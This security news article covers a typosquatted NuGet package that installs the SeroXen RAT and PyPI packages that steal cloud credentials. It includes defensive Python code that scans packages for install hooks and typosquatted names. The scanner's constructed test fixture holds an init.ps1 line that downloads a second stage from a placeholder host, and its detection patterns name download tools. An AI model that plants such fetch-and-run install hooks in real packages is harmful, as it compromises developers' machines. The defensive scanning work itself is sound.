In a recent development, a nefarious package hosted on the NuGet package manager for the .NET Framework has been uncovered, acting as a delivery mechanism for the SeroXen RAT, a remote access trojan. The package in question, named “Pathoschild.Stardew.Mod.Build.Config,” was published by a user with the handle “Disti.” Interestingly, this package disguises itself through typosquatting, closely resembling the legitimate “Pathoschild.Stardew.ModBuildConfig” package. This revelation was made by Phylum, a software supply chain security firm.

The authentic package has garnered nearly 79,000 downloads, whereas the malicious variant, published on October 6, 2023, has artificially inflated its download count to more than 100,000.

The profile behind this malicious package has also published six other packages, accumulating over 2.1 million downloads in total. Four of these packages masquerade as crypto service libraries for platforms like Kraken, KuCoin, Solana, and Monero. However, their true purpose is to deploy the SeroXen RAT.

The attack is set in motion during package installation via a “tools/init.ps1” script. Such scripts execute without presenting any warning to the developer, a weakness JFrog disclosed in March 2023 that had already been abused to retrieve next-stage malware.

The PowerShell script within the package is employed to download a file known as “x.bin” from a remote server. This file is, in reality, a heavily obfuscated Windows Batch script responsible for constructing and executing another PowerShell script, ultimately deploying the SeroXen RAT.
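The install-time hook described above is a property of the package archive itself, so it can be checked before a package is ever restored. The following is an added example, not code from Phylum or from the article: it opens a .nupkg (which is a zip file), reports any NuGet install hook such as tools/init.ps1, and flags download cmdlets inside it. The sample package it builds is constructed for the test and is not the real malicious artifact; the hook paths and cmdlet list are the example's own choices.

```python
"""Added example (not from the article or Phylum): inspect a .nupkg archive for
install-time PowerShell hooks and remote-fetch calls before restoring it."""

import io
import re
import zipfile
from typing import List

# NuGet runs these scripts inside Visual Studio when a package is installed
# (init.ps1) or added to a project (install.ps1). Their presence alone is a
# review trigger for a package that should only ship build configuration.
INSTALL_HOOKS = ("tools/init.ps1", "tools/install.ps1", "tools/uninstall.ps1")

# Cmdlets and .NET calls that fetch remote content; a hit means the hook is
# doing more than configuring the project.
DOWNLOAD_PATTERNS = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer|"
    r"DownloadString|DownloadFile|Net\.WebClient|\biwr\b|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)


def scan_nupkg(data: bytes) -> List[str]:
    """Return human-readable findings for one .nupkg given as raw bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        # Zip entry names are case-sensitive; normalise for lookup only.
        names = {n.lower(): n for n in z.namelist()}
        for hook in INSTALL_HOOKS:
            real = names.get(hook)
            if real is None:
                continue
            findings.append(f"install hook present: {real}")
            text = z.read(real).decode("utf-8", errors="replace")
            for m in DOWNLOAD_PATTERNS.finditer(text):
                findings.append(f"{real}: remote fetch via {m.group(0)}")
    return findings


def build_fixture(with_hook: bool) -> bytes:
    """Constructed sample package for demonstration; not a real artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Example.nuspec", "<package/>")
        z.writestr("build/Example.targets", "<Project/>")
        if with_hook:
            # Constructed hook that fetches a second stage, mirroring the
            # behaviour described in the article (URL is a placeholder).
            z.writestr(
                "tools/init.ps1",
                'Invoke-WebRequest -Uri "http://example.invalid/x.bin" '
                '-OutFile "$env:TEMP\\x.bin"\n',
            )
    return buf.getvalue()


if __name__ == "__main__":
    for line in scan_nupkg(build_fixture(True)):
        print(line)
```

Run it against files in a local NuGet cache (`~/.nuget/packages/<id>/<version>/<id>.<version>.nupkg`) by passing the file bytes to `scan_nupkg`; a clean build-configuration package should produce no findings at all.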

SeroXen RAT is commercially available malware, priced at $60 for a lifetime license, which makes it accessible to low-skilled cybercriminals. This fileless RAT combines the capabilities of Quasar RAT, the r77 rootkit, and the Windows command-line tool NirCmd.

This discovery highlights the ongoing exploitation of open-source ecosystems and the developers who use them. It serves as a reminder of the need for vigilance and security within these ecosystems.

This development coincides with the detection of seven malicious packages on the Python Package Index (PyPI) repository. These packages impersonate legitimate offerings from cloud service providers like Aliyun, AWS, and Tencent Cloud, covertly transmitting credentials to a concealed remote URL.

These packages include:

· python-alibabacloud-tea-openapi
· aws-enumerate-iam
· enumerate-iam-aws
· alisdkcore
· tencent-cloud-python-sdk
· python-alibabacloud-sdk-core
· alibabacloud-oss2

In this campaign, the attacker exploits a developer’s trust by subtly inserting malicious code into existing, well-established codebases, aiming to exfiltrate sensitive cloud credentials. The attacker’s strategy is minimalistic yet effective, as the malicious code preserves the original functionality of the packages, attempting to remain unnoticed.

Checkmarx, which also disclosed further details of this campaign, revealed an additional target: Telegram. The attackers utilized a deceptive package called “telethon2,” aiming to mimic “telethon,” a Python library for interacting with Telegram’s API.

The majority of downloads of these counterfeit libraries originate from the United States, followed by China, Hong Kong, Singapore, France, and Russia. The malicious code is hidden inside specific functions and runs only when those functions are called, while typosquatting and StarJacking techniques are used to lure developers into installing the packages.
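Both campaigns rely on names that look like something a developer already trusts: “Pathoschild.Stardew.Mod.Build.Config” differs from the real package only in where the dots sit, and “telethon2” is the real name plus one character. The following is an added example, not code from Checkmarx, Phylum or the article, of a pre-install name check a build pipeline could run: it compares a requested package name against an allowlist of names the organisation actually depends on, first after collapsing case and separators, then by edit distance, then by checking whether a trusted name is embedded inside a longer one. The allowlist is constructed for the example and the thresholds are the example's own.

```python
"""Added example (not from the article, Phylum or Checkmarx): flag package
names that collide with, or sit within a small edit distance of, trusted ones."""

import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed allowlist: the names this example treats as trusted. In practice
# this would be generated from the project's lock files.
KNOWN_GOOD: Dict[str, List[str]] = {
    "nuget": ["Pathoschild.Stardew.ModBuildConfig"],
    "pypi": ["telethon", "alibabacloud-tea-openapi"],
}


def normalize(name: str) -> str:
    """Collapse case and separator differences (PEP 503-style, plus dots) so
    'Mod.Build.Config' and 'ModBuildConfig' compare equal."""
    return re.sub(r"[-_.\s]", "", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Standard dynamic-programming edit distance; fine for name lengths."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


@dataclass
class Finding:
    candidate: str
    lookalike: str
    reason: str


def check_name(candidate: str, ecosystem: str,
               max_distance: int = 2) -> Optional[Finding]:
    """Return a Finding if `candidate` looks like a typosquat of a trusted
    name in `ecosystem`, or None if it is trusted or unrelated."""
    goods = KNOWN_GOOD[ecosystem]
    if candidate in goods:
        return None  # exact trusted name
    norm_c = normalize(candidate)
    for good in goods:
        norm_g = normalize(good)
        if norm_c == norm_g:
            return Finding(candidate, good, "separator/case collision")
        if levenshtein(norm_c, norm_g) <= max_distance:
            return Finding(candidate, good, f"edit distance <= {max_distance}")
        if norm_g in norm_c:
            return Finding(candidate, good, "embeds known-good name")
    return None


if __name__ == "__main__":
    for eco, name in [("nuget", "Pathoschild.Stardew.Mod.Build.Config"),
                      ("pypi", "telethon2"),
                      ("pypi", "python-alibabacloud-tea-openapi"),
                      ("pypi", "telethon")]:
        print(name, "->", check_name(name, eco))
```

The separator collapse is the check that matters most for the NuGet case: the two names are identical once dots are removed, so no edit-distance threshold is needed to catch it. The embedding rule is deliberately last because it produces the most false positives; treat its hits as a prompt for manual review rather than an automatic block.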

Earlier this month, Checkmarx exposed an elaborate campaign on PyPI, where 271 malicious Python packages were introduced to the software supply chain. These packages were equipped with functions to dismantle system defenses, and they collectively received approximately 75,000 downloads before being removed.
